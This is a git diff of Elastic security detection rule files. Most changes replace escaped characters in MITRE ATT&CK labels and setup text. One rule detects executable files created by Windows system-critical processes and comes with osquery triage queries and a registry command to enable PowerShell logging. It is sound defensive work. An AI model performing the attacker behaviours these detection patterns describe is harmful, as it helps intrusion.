+ "note": "## Triage and analysis\n\n### Investigating Unusual Executable File Creation by a System Critical Process\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is file operations.\n\nThis rule looks for the creation of executable files done by system-critical processes. This can indicate the exploitation of a vulnerability or a malicious process masquerading as a system-critical process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n",
 "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.extension : (\"exe\", \"dll\") and\n process.name : (\"smss.exe\",\n \"autochk.exe\",\n \"csrss.exe\",\n \"wininit.exe\",\n \"services.exe\",\n \"lsass.exe\",\n \"winlogon.exe\",\n \"userinit.exe\",\n \"LogonUI.exe\")\n",
 "related_integrations": [
 {
@@ -50,7 +50,7 @@
 ],
 "risk_score": 73,
 "rule_id": "e94262f2-c1e9-4d3f-a907-aeab16712e1a",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -79,7 +79,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_102.json b/packages/security_detection_engine/kibana/security_rule/e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_102.json
index 7a40986c66f..dbc4890a686 100644
--- a/packages/security_detection_engine/kibana/security_rule/e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_102.json
@@ -54,7 +54,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -76,7 +76,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_103.json b/packages/security_detection_engine/kibana/security_rule/e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_103.json
index 5962dbab311..c79df78111b 100644
--- a/packages/security_detection_engine/kibana/security_rule/e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_103.json
@@ -53,7 +53,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -75,7 +75,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_104.json b/packages/security_detection_engine/kibana/security_rule/e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_104.json
index 62ee5bd1093..87bcd61452d 100644
--- a/packages/security_detection_engine/kibana/security_rule/e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/e9abe69b-1deb-4e19-ac4a-5d5ac00f72eb_104.json
@@ -54,7 +54,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -76,7 +76,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/e9b0902b-c515-413b-b80b-a8dcebc81a66_1.json b/packages/security_detection_engine/kibana/security_rule/e9b0902b-c515-413b-b80b-a8dcebc81a66_1.json
index 9032178a404..88bcb4c44c1 100644
--- a/packages/security_detection_engine/kibana/security_rule/e9b0902b-c515-413b-b80b-a8dcebc81a66_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/e9b0902b-c515-413b-b80b-a8dcebc81a66_1.json
@@ -33,7 +33,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/ea09ff26-3902-4c53-bb8e-24b7a5d029dd_1.json b/packages/security_detection_engine/kibana/security_rule/ea09ff26-3902-4c53-bb8e-24b7a5d029dd_1.json
index 36d553b5d17..7fa8b6ee28c 100644
--- a/packages/security_detection_engine/kibana/security_rule/ea09ff26-3902-4c53-bb8e-24b7a5d029dd_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/ea09ff26-3902-4c53-bb8e-24b7a5d029dd_1.json
@@ -36,7 +36,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_105.json b/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_105.json
index b48e55f48ff..1172b540ee5 100644
--- a/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_105.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_106.json b/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_106.json
index fe01a951f1a..7057f1eb2c1 100644
--- a/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_106.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_107.json b/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_107.json
index cbe495fb4da..0950fd65bc6 100644
--- a/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_107.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_208.json b/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_208.json
index 2701de382fa..274a6be13af 100644
--- a/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_208.json
+++ b/packages/security_detection_engine/kibana/security_rule/ea248a02-bc47-4043-8e94-2885b19b2636_208.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/eb44611f-62a8-4036-a5ef-587098be6c43_1.json b/packages/security_detection_engine/kibana/security_rule/eb44611f-62a8-4036-a5ef-587098be6c43_1.json
index 40419103095..0e2d4bfa516 100644
--- a/packages/security_detection_engine/kibana/security_rule/eb44611f-62a8-4036-a5ef-587098be6c43_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/eb44611f-62a8-4036-a5ef-587098be6c43_1.json
@@ -43,7 +43,7 @@
 ],
 "risk_score": 21,
 "rule_id": "eb44611f-62a8-4036-a5ef-587098be6c43",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -70,7 +70,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/eb44611f-62a8-4036-a5ef-587098be6c43_2.json b/packages/security_detection_engine/kibana/security_rule/eb44611f-62a8-4036-a5ef-587098be6c43_2.json
index 994fa3efaf3..a4be95e0774 100644
--- a/packages/security_detection_engine/kibana/security_rule/eb44611f-62a8-4036-a5ef-587098be6c43_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/eb44611f-62a8-4036-a5ef-587098be6c43_2.json
@@ -42,7 +42,7 @@
 ],
 "risk_score": 21,
 "rule_id": "eb44611f-62a8-4036-a5ef-587098be6c43",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -54,7 +54,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -69,7 +69,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_105.json b/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_105.json
index 15353c528b0..e56516730ac 100644
--- a/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_105.json
@@ -48,7 +48,7 @@
 ],
 "risk_score": 47,
 "rule_id": "eb610e70-f9e6-4949-82b9-f1c5bcd37c39",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -88,7 +88,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_106.json b/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_106.json
index 59913ed2f9e..3ece37c48d3 100644
--- a/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_106.json
@@ -48,7 +48,7 @@
 ],
 "risk_score": 47,
 "rule_id": "eb610e70-f9e6-4949-82b9-f1c5bcd37c39",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -87,7 +87,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_107.json b/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_107.json
index c8b6a501442..1a87e1c96d0 100644
--- a/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_107.json
@@ -48,7 +48,7 @@
 ],
 "risk_score": 47,
 "rule_id": "eb610e70-f9e6-4949-82b9-f1c5bcd37c39",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -87,7 +87,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_108.json b/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_108.json
index b7e0b9a87b5..d77d9e4ea8c 100644
--- a/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_108.json
@@ -48,7 +48,7 @@
 ],
 "risk_score": 47,
 "rule_id": "eb610e70-f9e6-4949-82b9-f1c5bcd37c39",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -87,7 +87,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_109.json b/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_109.json
index 0ef2be18456..28a171fe407 100644
--- a/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_109.json
+++ b/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_109.json
@@ -48,7 +48,7 @@
 ],
 "risk_score": 47,
 "rule_id": "eb610e70-f9e6-4949-82b9-f1c5bcd37c39",
- "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n",
+ "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -87,7 +87,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_103.json b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_103.json
index a17b9f08954..e2f450cfb5e 100644
--- a/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_103.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_104.json b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_104.json
index 400070a6968..bfc78002731 100644
--- a/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_104.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_105.json b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_105.json
index d660d2fc75c..137a8690802 100644
--- a/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_105.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_106.json b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_106.json
index f77f11e5fa3..7aafbfc7729 100644
--- a/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_106.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_107.json b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_107.json
index 9ab21f9927a..0964206586f 100644
--- a/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_107.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_104.json b/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_104.json
